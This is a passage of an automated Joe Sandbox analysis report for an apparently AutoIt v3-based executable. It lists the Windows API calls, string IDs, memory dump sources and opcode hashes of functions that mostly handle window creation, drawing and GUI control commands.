• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0050A7A5
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0050A7B7
                                                                                                                                                                              • DestroyWindow.USER32 ref: 0050A7C5
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0050A7DF
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0050A7E6
                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0050A927
                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0050A937
                                                                                                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A97F
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0050A98B
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0050A9C5
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9E7
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050A9FA
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA05
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0050AA0E
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA1D
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0050AA26
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA2D
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0050AA38
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AA4A
                                                                                                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0053D9BC,00000000), ref: 0050AA60
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0050AA70
                                                                                                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0050AA96
                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0050AAB5
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050AAD7
                                                                                                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050ACC4
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0051D0EB
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0051D11C
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0051D128
                                                                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0051D142
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0051D151
                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D17C
                                                                                                                                                                              • GetSysColor.USER32(00000010), ref: 0051D184
                                                                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0051D18B
                                                                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 0051D19A
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0051D1A1
                                                                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0051D1EC
                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 0051D21E
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051D249
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColor.USER32(00000012), ref: 0051D3BE
                                                                                                                                                                                • Part of subcall function 0051D385: SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                                                                                                                                                • Part of subcall function 0051D385: GetSysColor.USER32(00000011), ref: 0051D400
                                                                                                                                                                                • Part of subcall function 0051D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                                                                                                                                                • Part of subcall function 0051D385: SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                                                                                                                                                • Part of subcall function 0051D385: SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                                                                                                                                                • Part of subcall function 0051D385: SelectObject.GDI32(?,?), ref: 0051D435
                                                                                                                                                                                • Part of subcall function 0051D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                                                                                                                                                • Part of subcall function 0051D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                                                                                                                                                • Part of subcall function 0051D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                                                                                                                                                • Part of subcall function 0051D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3521893082-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32 ref: 004B4956
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004B4998
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004B49A3
                                                                                                                                                                              • DestroyIcon.USER32(00000000), ref: 004B49AE
                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 004B49B9
                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0052E179
                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0052E1B2
                                                                                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0052E5E0
                                                                                                                                                                                • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                                                                                                                                              • SendMessageW.USER32 ref: 0052E627
                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0052E63E
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0052E654
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0052E65F
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 464785882-4108050209
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0050A42A
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0050A4E9
                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0050A527
                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0050A539
                                                                                                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0050A57F
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0050A58B
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0050A5CF
                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0050A5DE
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0050A5EE
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0050A5F2
                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0050A602
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A60B
                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0050A614
                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0050A642
                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0050A659
                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0050A694
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0050A6A8
                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0050A6B9
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0050A6E9
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0050A6F4
                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0050A6FF
                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0050A709
                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FE45E
                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0054DC88,?,\\.\,0054DBF0), ref: 004FE54B
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,0054DC88,?,\\.\,0054DBF0), ref: 004FE6B1
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                              • API String ID: 1038674560-86951937
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0051C598
                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0051C64E
                                                                                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0051C669
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0051C925
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,0054DBF0), ref: 00516245
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                              • API String ID: 3964851224-45149045
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 0051D3BE
                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 0051D3E8
                                                                                                                                                                              • GetSysColor.USER32(00000011), ref: 0051D400
                                                                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0051D435
                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0051D4CF
                                                                                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0051D4ED
                                                                                                                                                                              • DrawFocusRect.USER32(?,?), ref: 0051D4F8
                                                                                                                                                                              • GetSysColor.USER32(00000011), ref: 0051D506
                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0051D50E
                                                                                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0051D522
                                                                                                                                                                              • SelectObject.GDI32(?,0051D0B5), ref: 0051D539
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0051D544
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0051D54A
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0051D54F
                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0051D555
                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0051D55F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1996641542-0
                                                                                                                                                                              • Opcode ID: ec120159e3fd664c92c1d15a4ee9d0504d518fe49ad6ead3e741862f3e506e9e
                                                                                                                                                                              • Instruction ID: 52dfc6dc0ed13f9c3528ca3a5f6324a9eac203098cf61045a43fdfb628572148
                                                                                                                                                                              • Opcode Fuzzy Hash: ec120159e3fd664c92c1d15a4ee9d0504d518fe49ad6ead3e741862f3e506e9e
                                                                                                                                                                              • Instruction Fuzzy Hash: E2513D72900218AFDF109FA4EC48EEE7BB9FB18320F104515F915AB2A1D7759944DB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0051B5C0
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B5D1
                                                                                                                                                                              • CharNextW.USER32(0000014E), ref: 0051B600
                                                                                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0051B641
                                                                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0051B657
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B668
                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0051B685
                                                                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0051B6D7
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0051B6ED
                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0051B71E
                                                                                                                                                                              • _memset.LIBCMT ref: 0051B743
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0051B78C
                                                                                                                                                                              • _memset.LIBCMT ref: 0051B7EB
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051B815
                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0051B86D
                                                                                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0051B91A
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0051B93C
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 0051B986
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0051B9B3
                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 0051B9C2
                                                                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0051B9EA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                                                                                              • Opcode ID: 4907f1ed568022e2a421b7f3b859671dfd42336b96e4fc004ee2aaa89bebd72a
                                                                                                                                                                              • Instruction ID: 4bb2f065eae7e7022afd1f2783c071f5cfd9ba7d8cf2d6aaa3058c8d1bd0349f
                                                                                                                                                                              • Opcode Fuzzy Hash: 4907f1ed568022e2a421b7f3b859671dfd42336b96e4fc004ee2aaa89bebd72a
                                                                                                                                                                              • Instruction Fuzzy Hash: 45E18B71900218AAFF209F51DC85EEE7FB9FF05714F10815AF929AB290DB748A84DF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00517587
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0051759C
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 005175A3
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00517605
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00517631
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0051765A
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00517678
                                                                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0051769E
                                                                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 005176B3
                                                                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005176C6
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 005176E6
                                                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00517701
                                                                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00517715
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0051772D
                                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00517753
                                                                                                                                                                              • GetMonitorInfoW.USER32 ref: 0051776D
                                                                                                                                                                              • CopyRect.USER32(?,?), ref: 00517784
                                                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 005177EF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                                                                              • Opcode ID: c45035241f5b7a86bf6fc3319d425587face3dfe09b3c8c2fb92bc47d8f4be2d
                                                                                                                                                                              • Instruction ID: c220941e82fe2b87ee4085a4c1d4d851dd99f271af5076f5ee346bb6a48dbc58
                                                                                                                                                                              • Opcode Fuzzy Hash: c45035241f5b7a86bf6fc3319d425587face3dfe09b3c8c2fb92bc47d8f4be2d
                                                                                                                                                                              • Instruction Fuzzy Hash: F7B19E71608300AFEB04DF68C985BAABBF5FF88314F00891DF5999B291D774E844CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA839
                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 004CA841
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA86C
                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 004CA874
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 004CA899
                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004CA8B6
                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 004CA8C6
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004CA8F9
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004CA90D
                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004CA92B
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004CA947
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CA952
                                                                                                                                                                                • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                                                                                                                                                • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,004CACEE), ref: 004CA979
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                                                                                              • API String ID: 1458621304-248962490
                                                                                                                                                                              • Opcode ID: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                                                                                                                                              • Instruction ID: e47952e4cd301c4a974cfa1798eb7d0e4807169dcfac575dd9304b0ea2b86405
                                                                                                                                                                              • Opcode Fuzzy Hash: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                                                                                                                                              • Instruction Fuzzy Hash: 7BB18F7560020AAFDB14DFA8EC46FAE7BB4FF18318F10422AFA15A7290D734D851DB55
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00516A52
                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00516B12
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                              • API String ID: 3974292440-719923060
                                                                                                                                                                              • Opcode ID: 25df89f7b867d8ac3c595c65ddccb6e7ce3e0cc06ad21a3130d5bd0f86ceccff
                                                                                                                                                                              • Instruction ID: 6a32fb65732eb4c13778cbe720fe192dc1f7fc277360117ad11d0bcceb9b8dbd
